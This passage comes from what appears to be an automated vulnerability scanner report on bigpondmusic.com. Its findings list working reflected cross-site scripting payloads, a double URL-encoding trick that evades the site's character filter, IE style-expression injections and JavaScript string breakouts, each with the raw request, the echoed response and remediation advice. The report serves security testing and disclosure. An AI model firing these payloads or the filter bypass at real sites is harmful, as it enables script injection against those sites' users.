Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13/?ref=Net-Head-Music-Bargains29a14"style="x:expression(alert(1))"fe980943757" />
...[SNIP]...

2.183. http://bigpondmusic.com/bargains/under5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2659a2ed60e was submitted in the REST URL parameter 1. This input was echoed as 8cf67"><script>alert(1)</script>2659a2ed60e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains8cf67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2659a2ed60e/under5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87831


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains8cf67"><script>alert(1)</script>2659a2ed60e/under5" />
...[SNIP]...

2.184. http://bigpondmusic.com/bargains/under5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 444ae'%3b14886af3365 was submitted in the REST URL parameter 1. This input was echoed as 444ae';14886af3365 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains444ae'%3b14886af3365/under5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains444ae';14886af3365';
   s.prop4 = 'under5';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.185. http://bigpondmusic.com/bargains/under5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 625b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e473a7d2f336 was submitted in the REST URL parameter 2. This input was echoed as 625b9"><script>alert(1)</script>473a7d2f336 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under5625b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e473a7d2f336 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88122


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under5625b9"><script>alert(1)</script>473a7d2f336" />
...[SNIP]...

2.186. http://bigpondmusic.com/bargains/under5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae4bb'%3b381fbba2e70 was submitted in the REST URL parameter 2. This input was echoed as ae4bb';381fbba2e70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under5ae4bb'%3b381fbba2e70 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87901


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
esting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under5ae4bb';381fbba2e70';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.187. http://bigpondmusic.com/bargains/under5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e23"style%3d"x%3aexpression(alert(1))"359e420ded3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 86e23"style="x:expression(alert(1))"359e420ded3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under5?86e23"style%3d"x%3aexpression(alert(1))"359e420ded3=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 195591


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bargain Ep's - BigPond Music
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under5?86e23"style="x:expression(alert(1))"359e420ded3=1" />
...[SNIP]...

2.188. http://bigpondmusic.com/bigpondrecommends [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdfa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec42ffa9a0e was submitted in the REST URL parameter 1. This input was echoed as 2cdfa"><script>alert(1)</script>ec42ffa9a0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bigpondrecommends2cdfa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eec42ffa9a0e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87807


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bigpondrecommends2cdfa"><script>alert(1)</script>ec42ffa9a0e" />
...[SNIP]...

2.189. http://bigpondmusic.com/bigpondrecommends [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52be7'%3b8ce78a5cd85 was submitted in the REST URL parameter 1. This input was echoed as 52be7';8ce78a5cd85 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bigpondrecommends52be7'%3b8ce78a5cd85 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87734


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
v=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bigpondrecommends52be7';8ce78a5cd85';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.190. http://bigpondmusic.com/bigpondrecommends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bigpondrecommends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e216c"style%3d"x%3aexpression(alert(1))"e688e780f68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e216c"style="x:expression(alert(1))"e688e780f68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bigpondrecommends?e216c"style%3d"x%3aexpression(alert(1))"e688e780f68=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 154471


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>What are BigPond Music liste
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bigpondrecommends?e216c"style="x:expression(alert(1))"e688e780f68=1" />
...[SNIP]...

2.191. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4dc80'%3b9d005988f07 was submitted in the REST URL parameter 1. This input was echoed as 4dc80';9d005988f07 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bphf4dc80'%3b9d005988f07/header/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87944


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bphf4dc80';9d005988f07';
   s.prop4 = 'header';
   s.prop5 = 'adh.html';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s
...[SNIP]...

2.192. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ed91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc31052876 was submitted in the REST URL parameter 1. This input was echoed as 1ed91"><script>alert(1)</script>fc31052876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf1ed91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc31052876/header/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87983


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bphf1ed91"><script>alert(1)</script>fc31052876/header/adh.html" />
...[SNIP]...

2.193. http://bigpondmusic.com/bphf/header/adh.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bphf/header/adh.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea352504a772 was submitted in the REST URL parameter 2. This input was echoed as 664ab"><script>alert(1)</script>a352504a772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bphf/header664ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea352504a772/adh.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://bigpondmusic.com/?7c8ab"style%3d"x%3aexpression(alert(1))"27f2f63ab70=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: bigpondmusic.com
Proxy-Connection: Keep-Alive
Cookie: __utma=183468341.221961572.1290483697.1290483697.1290483697.1; __utmb=183468341.1.10.1290483697; __utmc=183468341; __utmz=183468341.1290483697.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:07:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88221


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
